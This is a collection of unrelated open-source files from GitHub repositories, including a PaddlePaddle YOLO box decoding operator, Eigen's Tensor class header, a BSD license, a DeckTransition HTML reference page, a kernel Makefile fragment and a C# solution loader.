    T* boxes_data = boxes->mutable_data<T>({n, box_num, 4}, ctx.GetPlace());
    memset(boxes_data, 0, boxes->numel() * sizeof(T));
    T* scores_data =
        scores->mutable_data<T>({n, box_num, class_num}, ctx.GetPlace());
    memset(scores_data, 0, scores->numel() * sizeof(T));

    T box[4];
    for (int i = 0; i < n; i++) {
      // ImgSize holds (height, width) per batch element.
      int img_height = imgsize_data[2 * i];
      int img_width = imgsize_data[2 * i + 1];

      for (int j = 0; j < an_num; j++) {
        for (int k = 0; k < h; k++) {
          for (int l = 0; l < w; l++) {
            // Entry 4 is the objectness logit.
            int obj_idx =
                GetEntryIndex(i, j, k * w + l, an_num, an_stride, stride, 4);
            T conf = sigmoid<T>(input_data[obj_idx]);
            if (conf < conf_thresh) {
              continue;
            }

            // Entries 0..3 are the raw box parameters.
            int box_idx =
                GetEntryIndex(i, j, k * w + l, an_num, an_stride, stride, 0);
            GetYoloBox<T>(box, input_data, anchors_data, l, k, j, h,
                          input_size, box_idx, stride, img_height, img_width,
                          scale, bias);
            box_idx = (i * box_num + j * stride + k * w + l) * 4;
            CalcDetectionBox<T>(boxes_data, box, box_idx, img_height,
                                img_width, clip_bbox);

            // Entries 5.. are per-class logits.
            int label_idx =
                GetEntryIndex(i, j, k * w + l, an_num, an_stride, stride, 5);
            int score_idx = (i * box_num + j * stride + k * w + l) * class_num;
            CalcLabelScore<T>(scores_data, input_data, label_idx, score_idx,
                              class_num, conf, stride);
          }
        }
      }
    }
  }
};

}  // namespace operators
}  // namespace paddle
{ "pile_set_name": "Github" }
# merb-more <ul class='toc'><li><a href='/en/merb-more/authentication'>Authentication</a><ul style='list-style: none;'><li><a href='/en/merb-more/authentication#merbauth_gems'>Merb-auth gems</a><ul style='list-style: none;'><li><a href='/en/merb-more/authentication#merbauthcore'>merb-auth-core</a></li><li><a href='/en/merb-more/authentication#merbauthmore'>merb-auth-more</a></li><li><a href='/en/merb-more/authentication#merbauthslicepassword'>merb-auth-slice-password</a></li></ul></li><li><a href='/en/merb-more/authentication#authentication_in_merb_stack'>Authentication in Merb Stack</a></li><li><a href='/en/merb-more/authentication#authenticated_hello_world'>Authenticated Hello World</a><ul style='list-style: none;'><li><a href='/en/merb-more/authentication#generate_an_application'>Generate an application</a></li><li><a href='/en/merb-more/authentication#generate_something_to_protect'>Generate something to protect</a></li><li><a href='/en/merb-more/authentication#protect_the_route'>Protect the route</a></li><li><a href='/en/merb-more/authentication#protect_the_controller'>Protect the controller</a></li><li><a href='/en/merb-more/authentication#overwrite_the_default_views'>Overwrite the default views</a></li></ul></li><li><a href='/en/merb-more/authentication#testing_an_authenticated_request'>Testing an authenticated request</a></li></ul></li></ul> <ul class='toc'><li><a href='/en/merb-more/mailer'>Mailer</a></li></ul> <ul class='toc'><li><a href='/en/merb-more/caching'>Caching</a></li></ul> <ul class='toc'><li><a href='/en/merb-more/exceptions'>Exceptions</a></li></ul> <ul class='toc'><li><a href='/en/merb-more/slices'>Slices</a></li></ul>
{ "pile_set_name": "Github" }
The BSD License

Copyright (c) 2009, Andrey Gliznetsov ([email protected]) All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

- Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
{ "pile_set_name": "Github" }
// This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2014 Benoit Steiner <[email protected]>
// Copyright (C) 2013 Christian Seiler <[email protected]>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a copy of the MPL was not distributed
// with this file, You can obtain one at http://mozilla.org/MPL/2.0/.

#ifndef EIGEN_CXX11_TENSOR_TENSOR_H
#define EIGEN_CXX11_TENSOR_TENSOR_H

namespace Eigen {

/** \class Tensor
  * \ingroup CXX11_Tensor_Module
  *
  * \brief The tensor class.
  *
  * The %Tensor class is the work-horse for all \em dense tensors within Eigen.
  *
  * The %Tensor class encompasses only dynamic-size objects so far.
  *
  * The first two template parameters are required:
  * \tparam Scalar_ \anchor tensor_tparam_scalar Numeric type, e.g. float, double, int or std::complex<float>.
  * User defined scalar types are supported as well (see \ref user_defined_scalars "here").
  * \tparam NumIndices_ Number of indices (i.e. rank of the tensor)
  *
  * The remaining template parameters are optional -- in most cases you don't have to worry about them.
  * \tparam Options_ \anchor tensor_tparam_options A combination of either \b #RowMajor or \b #ColMajor, and of either
  * \b #AutoAlign or \b #DontAlign.
  * The former controls \ref TopicStorageOrders "storage order", and defaults to column-major. The latter controls alignment, which is required
  * for vectorization. It defaults to aligning tensors. Note that tensors currently do not support any operations that profit from vectorization.
  * Support for such operations (i.e. adding two tensors etc.) is planned.
  *
  * You can access elements of tensors using normal subscripting:
  *
  * \code
  * Eigen::Tensor<double, 4> t(10, 10, 10, 10);
  * t(0, 1, 2, 3) = 42.0;
  * \endcode
  *
  * This class can be extended with the help of the plugin mechanism described on the page
  * \ref TopicCustomizingEigen by defining the preprocessor symbol \c EIGEN_TENSOR_PLUGIN.
  *
  * <i><b>Some notes:</b></i>
  *
  * <dl>
  * <dt><b>Relation to other parts of Eigen:</b></dt>
  * <dd>The midterm development goal for this class is to have a similar hierarchy as Eigen uses for matrices, so that
  * taking blocks or using tensors in expressions is easily possible, including an interface with the vector/matrix code
  * by providing .asMatrix() and .asVector() (or similar) methods for rank 2 and 1 tensors. However, currently, the %Tensor
  * class does not provide any of these features and is only available as a stand-alone class that just allows for
  * coefficient access. Also, when fixed-size tensors are implemented, the number of template arguments is likely to
  * change dramatically.</dd>
  * </dl>
  *
  * \ref TopicStorageOrders
  */

template<typename Scalar_, int NumIndices_, int Options_, typename IndexType_>
class Tensor : public TensorBase<Tensor<Scalar_, NumIndices_, Options_, IndexType_> >
{
  public:
    typedef Tensor<Scalar_, NumIndices_, Options_, IndexType_> Self;
    typedef TensorBase<Tensor<Scalar_, NumIndices_, Options_, IndexType_> > Base;
    typedef typename Eigen::internal::nested<Self>::type Nested;
    typedef typename internal::traits<Self>::StorageKind StorageKind;
    typedef typename internal::traits<Self>::Index Index;
    typedef Scalar_ Scalar;
    typedef typename NumTraits<Scalar>::Real RealScalar;
    typedef typename Base::CoeffReturnType CoeffReturnType;

    enum {
      IsAligned = bool(EIGEN_MAX_ALIGN_BYTES>0) & !(Options_&DontAlign),
      Layout = Options_ & RowMajor ? RowMajor : ColMajor,
      CoordAccess = true,
      RawAccess = true
    };

    static const int Options = Options_;
    static const int NumIndices = NumIndices_;
    typedef DSizes<Index, NumIndices_> Dimensions;

  protected:
    // Owns the coefficient buffer and the runtime dimensions.
    TensorStorage<Scalar, Dimensions, Options> m_storage;

#ifdef EIGEN_HAS_SFINAE
    // Distinguishes "normal" index packs (array<Index, N> or a single
    // integer) from user-supplied custom index types.
    template<typename CustomIndices>
    struct isOfNormalIndex{
      static const bool is_array = internal::is_base_of<array<Index, NumIndices>, CustomIndices>::value;
      static const bool is_int = NumTraits<CustomIndices>::IsInteger;
      static const bool value = is_array | is_int;
    };
#endif

  public:
    // ---- Metadata ----
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index                         rank()                   const { return NumIndices; }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index                         dimension(std::size_t n) const { return m_storage.dimensions()[n]; }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Dimensions&             dimensions()             const { return m_storage.dimensions(); }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index                         size()                   const { return m_storage.size(); }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar                        *data()                        { return m_storage.data(); }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar                  *data()                  const { return m_storage.data(); }

    // This makes EIGEN_INITIALIZE_COEFFS_IF_THAT_OPTION_IS_ENABLED
    // work, because that uses base().coeffRef() - and we don't yet
    // implement a similar class hierarchy
    inline Self& base()             { return *this; }
    inline const Self& base() const { return *this; }

    // ---- Coefficient read access (const) ----
#if EIGEN_HAS_VARIADIC_TEMPLATES
    template<typename... IndexTypes>
    EIGEN_DEVICE_FUNC inline const Scalar& coeff(Index firstIndex, Index secondIndex, IndexTypes... otherIndices) const
    {
      // The number of indices used to access a tensor coefficient must be equal to the rank of the tensor.
      EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
      return coeff(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}});
    }
#endif

    // normal indices
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff(const array<Index, NumIndices>& indices) const
    {
      eigen_internal_assert(checkIndexRange(indices));
      return m_storage.data()[linearizedIndex(indices)];
    }

    // custom indices
#ifdef EIGEN_HAS_SFINAE
    template<typename CustomIndices,
             EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) )
    >
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff(CustomIndices& indices) const
    {
        return coeff(internal::customIndices2Array<Index,NumIndices>(indices));
    }
#endif

    // rank-0 (scalar) access
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff() const
    {
      EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE);
      return m_storage.data()[0];
    }

    // flat (linear) access
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff(Index index) const
    {
      eigen_internal_assert(index >= 0 && index < size());
      return m_storage.data()[index];
    }

    // ---- Coefficient write access ----
#if EIGEN_HAS_VARIADIC_TEMPLATES
    template<typename... IndexTypes>
    inline Scalar& coeffRef(Index firstIndex, Index secondIndex, IndexTypes... otherIndices)
    {
      // The number of indices used to access a tensor coefficient must be equal to the rank of the tensor.
      EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
      return coeffRef(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}});
    }
#endif

    // normal indices
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef(const array<Index, NumIndices>& indices)
    {
      eigen_internal_assert(checkIndexRange(indices));
      return m_storage.data()[linearizedIndex(indices)];
    }

    // custom indices
#ifdef EIGEN_HAS_SFINAE
    template<typename CustomIndices,
             EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) )
    >
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef(CustomIndices& indices)
    {
        return coeffRef(internal::customIndices2Array<Index,NumIndices>(indices));
    }
#endif

    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef()
    {
      EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE);
      return m_storage.data()[0];
    }

    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef(Index index)
    {
      eigen_internal_assert(index >= 0 && index < size());
      return m_storage.data()[index];
    }

    // ---- operator() (const): forwards to coeff ----
#if EIGEN_HAS_VARIADIC_TEMPLATES
    template<typename... IndexTypes>
    inline const Scalar& operator()(Index firstIndex, Index secondIndex, IndexTypes... otherIndices) const
    {
      // The number of indices used to access a tensor coefficient must be equal to the rank of the tensor.
      EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
      return this->operator()(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}});
    }
#else
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1) const
    {
      return coeff(array<Index, 2>(i0, i1));
    }
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1, Index i2) const
    {
      return coeff(array<Index, 3>(i0, i1, i2));
    }
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1, Index i2, Index i3) const
    {
      return coeff(array<Index, 4>(i0, i1, i2, i3));
    }
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1, Index i2, Index i3, Index i4) const
    {
      return coeff(array<Index, 5>(i0, i1, i2, i3, i4));
    }
#endif

    // custom indices
#ifdef EIGEN_HAS_SFINAE
    template<typename CustomIndices,
             EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) )
    >
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(CustomIndices& indices) const
    {
        return coeff(internal::customIndices2Array<Index,NumIndices>(indices));
    }
#endif

    // normal indices
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(const array<Index, NumIndices>& indices) const
    {
      return coeff(indices);
    }

    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(Index index) const
    {
      eigen_internal_assert(index >= 0 && index < size());
      return coeff(index);
    }

    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()() const
    {
      EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE);
      return coeff();
    }

    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator[](Index index) const
    {
      // The bracket operator is only for vectors, use the parenthesis operator instead.
      EIGEN_STATIC_ASSERT(NumIndices == 1, YOU_MADE_A_PROGRAMMING_MISTAKE);
      return coeff(index);
    }

    // ---- operator() (non-const): forwards to coeffRef ----
#if EIGEN_HAS_VARIADIC_TEMPLATES
    template<typename... IndexTypes>
    inline Scalar& operator()(Index firstIndex, Index secondIndex, IndexTypes... otherIndices)
    {
      // The number of indices used to access a tensor coefficient must be equal to the rank of the tensor.
      EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
      return operator()(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}});
    }
#else
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1)
    {
      return coeffRef(array<Index, 2>(i0, i1));
    }
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1, Index i2)
    {
      return coeffRef(array<Index, 3>(i0, i1, i2));
    }
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1, Index i2, Index i3)
    {
      return coeffRef(array<Index, 4>(i0, i1, i2, i3));
    }
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1, Index i2, Index i3, Index i4)
    {
      return coeffRef(array<Index, 5>(i0, i1, i2, i3, i4));
    }
#endif

    // normal indices
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(const array<Index, NumIndices>& indices)
    {
      return coeffRef(indices);
    }

    // custom indices
#ifdef EIGEN_HAS_SFINAE
    template<typename CustomIndices,
             EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) )
    >
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(CustomIndices& indices)
    {
      return coeffRef(internal::customIndices2Array<Index,NumIndices>(indices));
    }
#endif

    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(Index index)
    {
      eigen_assert(index >= 0 && index < size());
      return coeffRef(index);
    }

    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()()
    {
      EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE);
      return coeffRef();
    }

    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator[](Index index)
    {
      // The bracket operator is only for vectors, use the parenthesis operator instead
      EIGEN_STATIC_ASSERT(NumIndices == 1, YOU_MADE_A_PROGRAMMING_MISTAKE)
      return coeffRef(index);
    }

    // ---- Constructors ----
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Tensor()
      : m_storage()
    {
    }

    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Tensor(const Self& other)
      : m_storage(other.m_storage)
    {
    }

#if EIGEN_HAS_VARIADIC_TEMPLATES
    template<typename... IndexTypes>
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index firstDimension, IndexTypes... otherDimensions)
        : m_storage(firstDimension, otherDimensions...)
    {
      // The number of dimensions used to construct a tensor must be equal to the rank of the tensor.
      EIGEN_STATIC_ASSERT(sizeof...(otherDimensions) + 1 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
    }
#else
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE explicit Tensor(Index dim1)
      : m_storage(dim1, array<Index, 1>(dim1))
    {
      EIGEN_STATIC_ASSERT(1 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
    }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2)
      : m_storage(dim1*dim2, array<Index, 2>(dim1, dim2))
    {
      EIGEN_STATIC_ASSERT(2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
    }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2, Index dim3)
      : m_storage(dim1*dim2*dim3, array<Index, 3>(dim1, dim2, dim3))
    {
      EIGEN_STATIC_ASSERT(3 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
    }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2, Index dim3, Index dim4)
      : m_storage(dim1*dim2*dim3*dim4, array<Index, 4>(dim1, dim2, dim3, dim4))
    {
      EIGEN_STATIC_ASSERT(4 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
    }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2, Index dim3, Index dim4, Index dim5)
      : m_storage(dim1*dim2*dim3*dim4*dim5, array<Index, 5>(dim1, dim2, dim3, dim4, dim5))
    {
      EIGEN_STATIC_ASSERT(5 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
    }
#endif

    /** Normal Dimension */
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE explicit Tensor(const array<Index, NumIndices>& dimensions)
        : m_storage(internal::array_prod(dimensions), dimensions)
    {
      EIGEN_INITIALIZE_COEFFS_IF_THAT_OPTION_IS_ENABLED
    }

    // Construct (and evaluate) from an arbitrary tensor expression.
    template<typename OtherDerived>
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Tensor(const TensorBase<OtherDerived, ReadOnlyAccessors>& other)
    {
      typedef TensorAssignOp<Tensor, const OtherDerived> Assign;
      Assign assign(*this, other.derived());
      resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions());
      internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
    }
    template<typename OtherDerived>
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Tensor(const TensorBase<OtherDerived, WriteAccessors>& other)
    {
      typedef TensorAssignOp<Tensor, const OtherDerived> Assign;
      Assign assign(*this, other.derived());
      resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions());
      internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
    }

    // Assignment resizes to the right-hand side's dimensions before copying.
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Tensor& operator=(const Tensor& other)
    {
      typedef TensorAssignOp<Tensor, const Tensor> Assign;
      Assign assign(*this, other);
      resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions());
      internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
      return *this;
    }
    template<typename OtherDerived>
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Tensor& operator=(const OtherDerived& other)
    {
      typedef TensorAssignOp<Tensor, const OtherDerived> Assign;
      Assign assign(*this, other);
      resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions());
      internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
      return *this;
    }

    // ---- Resizing ----
#if EIGEN_HAS_VARIADIC_TEMPLATES
    template<typename... IndexTypes> EIGEN_DEVICE_FUNC
    void resize(Index firstDimension, IndexTypes... otherDimensions)
    {
      // The number of dimensions used to resize a tensor must be equal to the rank of the tensor.
      EIGEN_STATIC_ASSERT(sizeof...(otherDimensions) + 1 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
      resize(array<Index, NumIndices>{{firstDimension, otherDimensions...}});
    }
#endif

    /** Normal Dimension */
    EIGEN_DEVICE_FUNC void resize(const array<Index, NumIndices>& dimensions)
    {
      int i;
      Index size = Index(1);
      for (i = 0; i < NumIndices; i++) {
        internal::check_rows_cols_for_overflow<Dynamic>::run(size, dimensions[i]);
        size *= dimensions[i];
      }
      #ifdef EIGEN_INITIALIZE_COEFFS
        bool size_changed = size != this->size();
        m_storage.resize(size, dimensions);
        if(size_changed) EIGEN_INITIALIZE_COEFFS_IF_THAT_OPTION_IS_ENABLED
      #else
        m_storage.resize(size, dimensions);
      #endif
    }

    // Why this overload, DSizes is derived from array ??? //
    EIGEN_DEVICE_FUNC void resize(const DSizes<Index, NumIndices>& dimensions) {
      array<Index, NumIndices> dims;
      for (int i = 0; i < NumIndices; ++i) {
        dims[i] = dimensions[i];
      }
      resize(dims);
    }

    EIGEN_DEVICE_FUNC
    void resize()
    {
      EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE);
      // Nothing to do: rank 0 tensors have fixed size
    }

    /** Custom Dimension */
#ifdef EIGEN_HAS_SFINAE
    template<typename CustomDimension,
             EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomDimension>::value) )
    >
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE void resize(CustomDimension& dimensions)
    {
      resize(internal::customIndices2Array<Index,NumIndices>(dimensions));
    }
#endif

#ifndef EIGEN_EMULATE_CXX11_META_H
    template <typename std::ptrdiff_t... Indices>
    EIGEN_DEVICE_FUNC
    void resize(const Sizes<Indices...>& dimensions) {
      array<Index, NumIndices> dims;
      for (int i = 0; i < NumIndices; ++i) {
        dims[i] = static_cast<Index>(dimensions[i]);
      }
      resize(dims);
    }
#else
    template <std::size_t V1, std::size_t V2, std::size_t V3, std::size_t V4, std::size_t V5>
    EIGEN_DEVICE_FUNC
    void resize(const Sizes<V1, V2, V3, V4, V5>& dimensions) {
      array<Index, NumIndices> dims;
      for (int i = 0; i < NumIndices; ++i) {
        dims[i] = static_cast<Index>(dimensions[i]);
      }
      resize(dims);
    }
#endif

  protected:

    // Debug-only range check used by the coeff/coeffRef assertions.
    bool checkIndexRange(const array<Index, NumIndices>& indices) const
    {
      using internal::array_apply_and_reduce;
      using internal::array_zip_and_reduce;
      using internal::greater_equal_zero_op;
      using internal::logical_and_op;
      using internal::lesser_op;

      return
        // check whether the indices are all >= 0
        array_apply_and_reduce<logical_and_op, greater_equal_zero_op>(indices) &&
        // check whether the indices fit in the dimensions
        array_zip_and_reduce<logical_and_op, lesser_op>(indices, m_storage.dimensions());
    }

    // Map a multi-index to a flat offset according to the storage order.
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index linearizedIndex(const array<Index, NumIndices>& indices) const
    {
      if (Options&RowMajor) {
        return m_storage.dimensions().IndexOfRowMajor(indices);
      } else {
        return m_storage.dimensions().IndexOfColMajor(indices);
      }
    }
};

} // end namespace Eigen

#endif // EIGEN_CXX11_TENSOR_TENSOR_H
{ "pile_set_name": "Github" }
{ "texture_filenames": [ "textures/multiplayer_dead.webp" ], "blendmode": "ALPHA", "desired_format": [ "F_8888" ] }
{ "pile_set_name": "Github" }
<!DOCTYPE html> <html lang="en"> <head> <title>UINavigationController Extension Reference</title> <link rel="stylesheet" type="text/css" href="../css/jazzy.css" /> <link rel="stylesheet" type="text/css" href="../css/highlight.css" /> <meta charset='utf-8'> <script src="../js/jquery.min.js" defer></script> <script src="../js/jazzy.js" defer></script> </head> <body> <a name="//apple_ref/swift/Extension/UINavigationController" class="dashAnchor"></a> <a title="UINavigationController Extension Reference"></a> <header> <div class="content-wrapper"> <p><a href="../index.html">DeckTransition Docs</a> (100% documented)</p> <p class="header-right"><a href="https://github.com/HarshilShah/DeckTransition"><img src="../img/gh.png"/>View on GitHub</a></p> <p class="header-right"><a href="dash-feed://https%3A%2F%2Fharshilshah%2Egithub%2Eio%2Fdocsets%2FDeckTransition%2Exml"><img src="../img/dash.png"/>Install in Dash</a></p> </div> </header> <div class="content-wrapper"> <p id="breadcrumbs"> <a href="../index.html">DeckTransition Reference</a> <img id="carat" src="../img/carat.png" /> UINavigationController Extension Reference </p> </div> <div class="content-wrapper"> <nav class="sidebar"> <ul class="nav-groups"> <li class="nav-group-name"> <a href="../Guides.html">Guides</a> <ul class="nav-group-tasks"> <li class="nav-group-task"> <a href="../uiscrollview-detection.html">UIScrollView Detection</a> </li> </ul> </li> <li class="nav-group-name"> <a href="../Classes.html">Classes</a> <ul class="nav-group-tasks"> <li class="nav-group-task"> <a href="../Classes/DeckSegue.html">DeckSegue</a> </li> <li class="nav-group-task"> <a href="../Classes/DeckTransitioningDelegate.html">DeckTransitioningDelegate</a> </li> </ul> </li> <li class="nav-group-name"> <a href="../Extensions.html">Extensions</a> <ul class="nav-group-tasks"> <li class="nav-group-task"> <a href="../Extensions/UINavigationController.html">UINavigationController</a> </li> <li class="nav-group-task"> <a 
href="../Extensions/UITabBarController.html">UITabBarController</a> </li> </ul> </li> <li class="nav-group-name"> <a href="../Protocols.html">Protocols</a> <ul class="nav-group-tasks"> <li class="nav-group-task"> <a href="../Protocols/DeckSnapshotUpdater.html">DeckSnapshotUpdater</a> </li> <li class="nav-group-task"> <a href="../Protocols/DeckTransitionViewControllerProtocol.html">DeckTransitionViewControllerProtocol</a> </li> </ul> </li> </ul> </nav> <article class="main-content"> <section> <section class="section"> <h1>UINavigationController</h1> </section> <section class="section task-group-section"> <div class="task-group"> <ul> <li class="item"> <div> <code> <a name="/c:@CM@DeckTransition@@objc(cs)UINavigationController(py)childViewControllerForDeck"></a> <a name="//apple_ref/swift/Property/childViewControllerForDeck" class="dashAnchor"></a> <a class="token" href="#/c:@CM@DeckTransition@@objc(cs)UINavigationController(py)childViewControllerForDeck">childViewControllerForDeck</a> </code> </div> <div class="height-container"> <div class="pointer-container"></div> <section class="section"> <div class="pointer"></div> <div class="abstract"> <p>The view controller at the top of the navigation stack is assumed to contain the <code>UIScrollView</code> to be tracked</p> </div> <div class="declaration"> <h4>Declaration</h4> <div class="language"> <p class="aside-title">Swift</p> <pre class="highlight"><code><span class="kd">public</span> <span class="k">var</span> <span class="nv">childViewControllerForDeck</span><span class="p">:</span> <span class="kt">UIViewController</span><span class="p">?</span></code></pre> </div> </div> <div class="slightly-smaller"> <a href="https://github.com/HarshilShah/DeckTransition/tree/master/Source/Extensions/UIViewController+DeckTransitionViewControllerProtocol.swift#L25-L27">Show on GitHub</a> </div> </section> </div> </li> </ul> </div> </section> </section> <section id="footer"> <p>Copyright © 2017 Harshil Shah. 
Available under the MIT License.</p> <p>Generated by <a class="link" href="https://github.com/realm/jazzy" target="_blank" rel="external">jazzy ♪♫ v0.9.0</a>, a <a class="link" href="http://realm.io" target="_blank" rel="external">Realm</a> project.</p> </section> </article> </div> </body> </html>
{ "pile_set_name": "Github" }
bnx2i-y := bnx2i_init.o bnx2i_hwi.o bnx2i_iscsi.o bnx2i_sysfs.o obj-$(CONFIG_SCSI_BNX2_ISCSI) += bnx2i.o
{ "pile_set_name": "Github" }
using System.Threading.Tasks;

namespace AvalonStudio.Projects
{
    /// <summary>
    /// Solution-type handler registered for Visual Studio ".sln" files.
    /// </summary>
    [ExportSolutionType("sln")]
    public class VisualStudioSolutionType : ISolutionType
    {
        /// <summary>Human-readable name displayed for this solution type.</summary>
        public string Description => "Solution File";

        /// <summary>
        /// Loads the solution file at <paramref name="path"/>, performing the
        /// parse on a thread-pool thread so the caller is not blocked.
        /// </summary>
        /// <param name="path">Full path to the .sln file.</param>
        /// <returns>The loaded solution.</returns>
        public async Task<ISolution> LoadAsync(string path)
        {
            ISolution solution = await Task.Run(() => VisualStudioSolution.Load(path));
            return solution;
        }
    }
}
